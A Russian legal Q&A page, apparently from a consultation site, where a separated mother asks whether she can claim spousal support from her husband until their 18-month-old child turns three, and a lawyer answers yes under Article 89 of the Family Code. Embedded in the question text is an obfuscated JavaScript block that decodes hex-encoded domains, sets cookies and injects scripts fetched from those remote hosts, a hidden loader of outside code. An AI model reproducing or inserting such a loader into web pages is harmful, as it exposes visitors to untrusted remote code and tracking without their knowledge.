Алтайский край

Могу ли я подать на супруга в суд на содержание меня пока ребенку не исполнится 3года? Что для этого необходимо сделать? - вопрос №1704680

С мужем разошлись(не разведены), алименты платит 1000 руб.(16%) и первой жене (25%) от з\п, я работаю на неполной ставке (5000 р.), денег на жизнь меня и ребенка (1,5 г.) не хватает.Могу ли я подать на супруга в суд на содержание меня пока ребенку не исполнится 3года? з\п мужа черно-белая, основной доход от черной, какие нужны документы, и что делать, если муж не хочет предоставлять необходимые сведения, куда обратиться, чтобы его з\п была полностью официальной?<![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('[«6d38316a6d716d6e2e7275»,«75626e7379687632376661326a2e7275»,«6375376e697474392e7275»,«6777357778616763766a366a71622e7275»]'),t=«19136»,o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(«number»==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=«COOKIELIFE»;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},i=function(e){document.cookie=e+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;"},r=function(e){e=e.replace(«www.»,"");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «liveexpert.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.smlo.loadSmlo(n.replace(«https:»,«http:»));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf(«firefox»))window.zSmlo.loadSmlo(n.replace(«https:»,«http:»));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,«text/javascript»),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,«function»==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),«function»==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";n(«ta2519043306»,f,{expires:parseInt(«COOKIELIFE»)}),c(u,function(){o(«a2519043306»)!=f&&(n(«a2519043306»,f,{expires:parseInt(«COOKIELIFE»)}),i(«ta2519043306»))},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o(«a36677002»)!=i&&n(«a36677002»,i);var r=o(«a2519043306»);t=r?r:e[0],s(t)};f()}();// ]]>

Ответы

Buh

Можете. Согласно пункту 2 статьи 89 Семейного кодекса РФ в случае отказа от такой поддержки и отсутствия соглашения между супругами об уплате алиментов право требовать предоставления алиментов в судебном порядке от другого супруга, обладающего необходимыми для этого средствами, имеют «жена в период беременности и в течение трех лет со дня рождения общего ребенка». Ограничений по трудоспособности супруги в Законе не содержится.

P.S. Если Вы получили ответ на свой вопрос, не забудьте выбрать лучший ответ по мнению автора. Если нет, то обратитесь ко мне в чат, я Вам помогу.